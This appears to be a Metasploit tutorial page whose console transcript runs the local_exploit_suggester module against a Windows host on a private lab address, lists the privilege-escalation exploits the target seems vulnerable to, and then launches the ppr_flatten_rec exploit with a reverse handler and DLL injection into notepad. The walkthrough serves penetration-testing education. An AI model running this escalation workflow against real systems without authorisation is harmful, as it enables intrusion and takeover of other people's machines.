Metasploit - local_exploit_suggester

msf post(local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          1                yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > run

[*] 192.168.1.102 - Collecting local exploits for x86/windows...
[*] 192.168.1.102 - The following 28 exploit checks are being tried:
[*] 192.168.1.102 - exploit/windows/local/adobe_sandbox_adobecollabsync
[*] 192.168.1.102 - exploit/windows/local/agnitum_outpost_acs
[*] 192.168.1.102 - exploit/windows/local/always_install_elevated
[*] 192.168.1.102 - exploit/windows/local/bthpan
[*] 192.168.1.102 - exploit/windows/local/bypassuac
[*] 192.168.1.102 - exploit/windows/local/bypassuac_injection
[*] 192.168.1.102 - exploit/windows/local/ikeext_service
[*] 192.168.1.102 - exploit/windows/local/ipass_launch_app
[*] 192.168.1.102 - exploit/windows/local/lenovo_systemupdate
[*] 192.168.1.102 - exploit/windows/local/mqac_write
[*] 192.168.1.102 - exploit/windows/local/ms10_015_kitrap0d
[*] 192.168.1.102 - exploit/windows/local/ms10_092_schelevator
[*] 192.168.1.102 - exploit/windows/local/ms11_080_afdjoinleaf
[*] 192.168.1.102 - exploit/windows/local/ms13_005_hwnd_broadcast
[*] 192.168.1.102 - exploit/windows/local/ms13_053_schlamperei
[*] 192.168.1.102 - exploit/windows/local/ms13_081_track_popup_menu
[*] 192.168.1.102 - exploit/windows/local/ms14_058_track_popup_menu
[*] 192.168.1.102 - exploit/windows/local/ms14_070_tcpip_ioctl
[*] 192.168.1.102 - exploit/windows/local/ms15_004_tswbproxy
[*] 192.168.1.102 - exploit/windows/local/ms15_051_client_copy_image
[*] 192.168.1.102 - exploit/windows/local/ms_ndproxy
[*] 192.168.1.102 - exploit/windows/local/novell_client_nicm
[*] 192.168.1.102 - exploit/windows/local/novell_client_nwfs
[*] 192.168.1.102 - exploit/windows/local/ntapphelpcachecontrol
[*] 192.168.1.102 - exploit/windows/local/powershell_remoting
[*] 192.168.1.102 - exploit/windows/local/ppr_flatten_rec
[*] 192.168.1.102 - exploit/windows/local/service_permissions
[*] 192.168.1.102 - exploit/windows/local/virtual_box_guest_additions
[*] 192.168.1.102 - exploit/windows/local/adobe_sandbox_adobecollabsync: Cannot reliably check exploitability.
[*] 192.168.1.102 - exploit/windows/local/agnitum_outpost_acs: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/always_install_elevated: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/bthpan: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/bypassuac: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/bypassuac_injection: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[*] 192.168.1.102 - exploit/windows/local/ipass_launch_app: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/lenovo_systemupdate: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/mqac_write: The target is not exploitable.
[+] 192.168.1.102 - exploit/windows/local/ms10_015_kitrap0d: The target appears to be vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[*] 192.168.1.102 - exploit/windows/local/ms11_080_afdjoinleaf: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/ms13_005_hwnd_broadcast: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ms13_053_schlamperei: The target is vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms13_081_track_popup_menu: The target is vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms14_058_track_popup_menu: The target service is running, but could not be validated.
[*] 192.168.1.102 - exploit/windows/local/ms14_070_tcpip_ioctl: The target is not exploitable.
[+] 192.168.1.102 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.1.102 - exploit/windows/local/ms15_051_client_copy_image: The target service is running, but could not be validated.
[*] 192.168.1.102 - exploit/windows/local/ms_ndproxy: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/novell_client_nicm: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/novell_client_nwfs: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/ntapphelpcachecontrol: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/powershell_remoting: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ppr_flatten_rec: The target is vulnerable.
[*] 192.168.1.102 - exploit/windows/local/service_permissions: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/virtual_box_guest_additions: The target is not exploitable.
[*] Post module execution completed
msf post(local_exploit_suggester) > use exploit/windows/local/ppr_flatten_rec
msf exploit(ppr_flatten_rec) > show options 

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(ppr_flatten_rec) > run

[*] Started reverse handler on 192.168.1.108:4444 
[*] Launching notepad to host the exploit...
[+] Process 872 launched.
[*] Reflectively injecting the exploit DLL into 872...
[*] Injecting exploit into 872 ...
[*] Exploit injected. Injecting payload into 872...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 10 sec ...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.

References

https://community.rapid7.com/community/metasploit/blog/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more
